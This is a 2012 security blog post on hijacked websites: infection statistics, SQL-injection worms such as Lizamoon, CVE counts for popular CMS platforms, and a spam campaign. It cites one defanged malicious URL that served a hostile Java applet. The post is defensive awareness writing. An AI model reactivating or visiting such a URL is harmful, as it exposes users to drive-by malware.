Thursday, October 18, 2012

Hijacked websites by the numbers

Two weeks ago, I had the chance to give a presentation about the danger of hijacked websites (you can download the presentation in French here). I used the talk to highlight various points which illustrate the extent of the problem.

Some numbers

70% of malicious links were found on hijacked websites in 2011 (Sophos, page 39). In 2012, Google is finding 9,500 newly malicious websites every day, mostly hijacked sites (Google, 2012). The Blackhole exploit kit alone is estimated to be present on several million websites per year (AVG, weekly count).

Nikkju, a web based worm that used SQL injection to spread, has infected about 200,000 websites. Lizamoon, which started propagating in 2010, infected about 1.5 million websites via SQL injection.

High profile victims

Since the hijacking of websites is mostly automated, websites of all types are getting compromised. Here are some of the high-profile websites that have been hijacked:

The list of hijacked websites includes many governmental websites from all over the world, including the United States.

Vulnerable software

The attack
surface of website is quite large, an attacker can target the CMS, its plugins, administration
tools (PHPMyAdmin, Plesk, cPanel - tools which should not be publicly accessible), the web server, the FTP server, the
DNS server, etc.

I looked at the number of CVEs issued in 2012 for the most popular software platforms in these areas:

WordPress: 14 CVEs for the core, 42 for extensions, including security extensions that are supposed to make WordPress safer.

Joomla: 7 in core

Drupal: 20+ in core

PHPMyAdmin: 5 - Gemenenet, a security company, was compromised through a vulnerability in PHPMyAdmin

If you want some examples of hijacked websites redirecting users to malicious pages, you can take a look at your inbox. Just this morning, I received four similar messages about a fictitious payment sent to me through Intuit:

These pages redirect to the same malicious page hxxp://navisiteseparation.net/detects/processing-details_requested.php. This page runs a malicious Java Applet. Unfortunately, I could not retrieve the content a second time for further analysis.

This is just one of the many spam campaigns that lead visitors to a malicious site.